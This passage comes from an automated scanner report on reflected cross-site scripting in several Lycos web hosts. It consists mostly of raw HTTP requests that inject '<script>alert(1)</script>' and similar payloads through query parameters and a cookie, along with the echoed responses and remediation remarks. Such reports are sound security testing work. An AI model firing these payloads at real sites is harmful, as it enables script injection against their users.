P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17520
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_video50828";alert(1)//3e5bc5531b2"; //--> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de7a"><script>alert(1)</script>0aa4e76c954 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/?tab=multi&cat=video7de7a"><script>alert(1)</script>0aa4e76c954 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_video7de7a"><script>alert(1)</script>0aa4e76c954&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
3.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><script>alert(1)</script>9c23e31d9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/?2baf1"><script>alert(1)</script>9c23e31d9b9=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?2baf1"><script>alert(1)</script>9c23e31d9b9=1&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae732"><script>alert(1)</script>fc2ad86c0a was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/?tab=multiae732"><script>alert(1)</script>fc2ad86c0a&cat=video HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multiae732"><script>alert(1)</script>fc2ad86c0a&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f38a"%3balert(1)//20a4f660a78 was submitted in the diktfc cookie. This input was echoed as 2f38a";alert(1)//20a4f660a78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a"%3balert(1)//20a4f660a78; PENTA=174.121.222.18.1292163892141045
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7045"><script>alert(1)</script>e23721f874e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: advertising.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e; PENTA=174.121.222.18.1292163892141045
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8531"%3balert(1)//6adf9a53388 was submitted in the diktfc cookie. This input was echoed as d8531";alert(1)//6adf9a53388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531"%3balert(1)//6adf9a53388; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15464
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ebb"><script>alert(1)</script>473ae392abf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b5d"%3balert(1)//fbdd08a21ac was submitted in the diktfc cookie. This input was echoed as 73b5d";alert(1)//fbdd08a21ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d"%3balert(1)//fbdd08a21ac; PENTA=174.121.222.18.1292163890688109
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719d"><script>alert(1)</script>1c833ec0851 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851; PENTA=174.121.222.18.1292163890688109
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad8cc"%3balert(1)//75d1be7661c was submitted in the diktfc cookie. This input was echoed as ad8cc";alert(1)//75d1be7661c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc"%3balert(1)//75d1be7661c; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15461
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532cd"><script>alert(1)</script>325056d76aa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=advertising.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ccd"%3balert(1)//96aec635ab1 was submitted in the diktfc cookie. This input was echoed as 97ccd";alert(1)//96aec635ab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd"%3balert(1)//96aec635ab1
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4848d"><script>alert(1)</script>8271264fa99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3373"%3balert(1)//cb851bc2ef was submitted in the diktfc cookie. This input was echoed as a3373";alert(1)//cb851bc2ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
